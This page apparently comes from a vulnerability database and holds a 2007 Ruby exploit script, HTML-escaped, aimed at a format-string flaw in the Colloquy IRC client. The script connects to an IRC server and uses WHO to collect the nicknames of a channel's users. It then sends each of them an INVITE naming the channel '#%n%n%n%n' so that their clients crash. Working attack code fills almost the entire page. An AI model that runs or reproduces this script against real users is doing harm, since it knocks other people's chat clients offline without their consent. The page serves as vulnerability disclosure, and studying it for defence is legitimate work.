Colloquy <= 2.1.3545 (INVITE) Format String Denial of Service Exploit

🗓️ 18 Jan 2007 00:00:00Reported by RootType
Denial of Service Exploit in Colloquy <= 2.1.3545 (INVITE) Format Strin

                                                #!/usr/bin/ruby
#&nbsp;(c)&nbsp;Copyright&nbsp;2006&nbsp;Lance&nbsp;M.&nbsp;Havok&nbsp;&lt;[email protected]&gt;
#
#&nbsp;Makes&nbsp;use&nbsp;of&nbsp;the&nbsp;Colloquy&nbsp;INVITE&nbsp;format&nbsp;string&nbsp;vulnerability.
#

require&nbsp;'socket'

target_channel&nbsp;&nbsp;=&nbsp;(ARGV[0]&nbsp;||&nbsp;&quot;#whatever&quot;)
target_server&nbsp;&nbsp;&nbsp;=&nbsp;(ARGV[1]&nbsp;||&nbsp;&quot;irc.server.org&quot;)
target_port&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;(ARGV[2]&nbsp;||&nbsp;6667)

rand_nick&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;&quot;spongebo&quot;
channel_joined&nbsp;&nbsp;=&nbsp;false
ready_to_go&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;false
abuse_attempts&nbsp;&nbsp;=&nbsp;2
chan_fmtstring&nbsp;&nbsp;=&nbsp;(&quot;#%n%n%n%n&quot;)&nbsp;#&nbsp;develop&nbsp;payload&nbsp;when&nbsp;feeling&nbsp;like&nbsp;it.
target_furries&nbsp;=&nbsp;[]

irc_socket&nbsp;=&nbsp;TCPSocket.new(target_server,&nbsp;target_port.to_i)

irc_socket.print&nbsp;&quot;USER&nbsp;#{rand_nick}&nbsp;localhost&nbsp;localhost&nbsp;r\n&quot;
irc_socket.print&nbsp;&quot;NICK&nbsp;#{rand_nick}\r\n&quot;
while&nbsp;true
&nbsp;&nbsp;s&nbsp;=&nbsp;irc_socket.gets
&nbsp;&nbsp;case&nbsp;s.strip
&nbsp;&nbsp;&nbsp;&nbsp;when&nbsp;/^PING&nbsp;:(.+)$/i
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;puts&nbsp;&quot;++&nbsp;PING...&quot;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;irc_socket.send&nbsp;&quot;PONG&nbsp;:#{$1}\n&quot;,&nbsp;0
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;puts&nbsp;&quot;++&nbsp;PONG.&quot;
&nbsp;&nbsp;&nbsp;&nbsp;when&nbsp;/^:(.+?)!(.+?)@(.+?)\sPRIVMSG\s.+\s:[\001]PING&nbsp;(.+)[\001]$/i
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;puts&nbsp;&quot;++&nbsp;CTCP&nbsp;PING&nbsp;from&nbsp;#{$1}!#{$2}@#{$3}&quot;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;irc_socket.send&nbsp;&quot;NOTICE&nbsp;#{$1}&nbsp;:\001PING&nbsp;#{$4}\001\n&quot;,&nbsp;0
&nbsp;&nbsp;&nbsp;&nbsp;when&nbsp;/^:(.+?)!(.+?)@(.+?)\sPRIVMSG\s.+\s:[\001]VERSION[\001]$/i
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;puts&nbsp;&quot;++&nbsp;CTCP&nbsp;VERSION&nbsp;from&nbsp;#{$1}!#{$2}@#{$3}&quot;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;irc_socket.send&nbsp;&quot;NOTICE&nbsp;#{$1}&nbsp;:\001VERSION&nbsp;Unabomber&nbsp;v0.011\001\n&quot;,&nbsp;0
&nbsp;&nbsp;&nbsp;&nbsp;when&nbsp;/n=(.+)&nbsp;(.+)&nbsp;(.+)&nbsp;(.+)&nbsp;(.+)&nbsp;(.*)$/i
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;nickarr&nbsp;=&nbsp;s.scan(/n=(.+)&nbsp;(.+)&nbsp;(.+)&nbsp;(.+)&nbsp;(.+)&nbsp;(.*)/).flatten

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;nickarr.size&nbsp;&gt;&nbsp;3
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;nickarr[2].size&nbsp;&gt;&nbsp;2&nbsp;and&nbsp;nickarr[2]&nbsp;!=&nbsp;target_server
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;nickarr&nbsp;=&nbsp;nickarr[2]
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;elsif&nbsp;nickarr[1].size&nbsp;&gt;&nbsp;2&nbsp;and&nbsp;nickarr[1]&nbsp;!=&nbsp;target_server
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;nickarr&nbsp;=&nbsp;nickarr[1]
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;elsif&nbsp;nickarr[3].size&nbsp;&gt;&nbsp;2&nbsp;and&nbsp;nickarr[3]&nbsp;!=&nbsp;target_server
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;nickarr&nbsp;=&nbsp;nickarr[3]
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target_furries&nbsp;&lt;&lt;&nbsp;nickarr
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end
&nbsp;&nbsp;&nbsp;&nbsp;else
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;unless&nbsp;channel_joined
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#irc_socket.send&nbsp;&quot;JOIN&nbsp;#{target_channel}\n&quot;,&nbsp;0&nbsp;(uncomment&nbsp;to&nbsp;join&nbsp;channel)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;irc_socket.send&nbsp;&quot;JOIN&nbsp;#{chan_fmtstring}\n&quot;,&nbsp;0
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;channel_joined&nbsp;=&nbsp;true
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;channel_joined&nbsp;and&nbsp;abuse_attempts&nbsp;!=&nbsp;0
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;irc_socket.send&nbsp;&quot;WHO&nbsp;#{target_channel}\n&quot;,&nbsp;0
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;abuse_attempts&nbsp;-=&nbsp;1
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;we&nbsp;need&nbsp;to&nbsp;throttle&nbsp;the&nbsp;pwnage&nbsp;or&nbsp;server&nbsp;will&nbsp;kick&nbsp;our&nbsp;ass
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;target_furries.size&nbsp;&gt;&nbsp;1
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target_furries.each&nbsp;do&nbsp;|zealot|
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;puts&nbsp;&quot;++&nbsp;Pwning&nbsp;#{zealot}&quot;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;irc_socket.send&nbsp;&quot;INVITE&nbsp;#{zealot}&nbsp;#{chan_fmtstring}\n&quot;,&nbsp;0
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sleep&nbsp;1
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end
&nbsp;&nbsp;end
end
18 Jan 2007 00:00Current
7.1High risk
Vulners AI Score7.1
Colloquy &lt;= 2.1.3545 (INVITE) Format String Denial of Service Exploit

Colloquy <= 2.1.3545 (INVITE) Format String Denial of Service Exploit
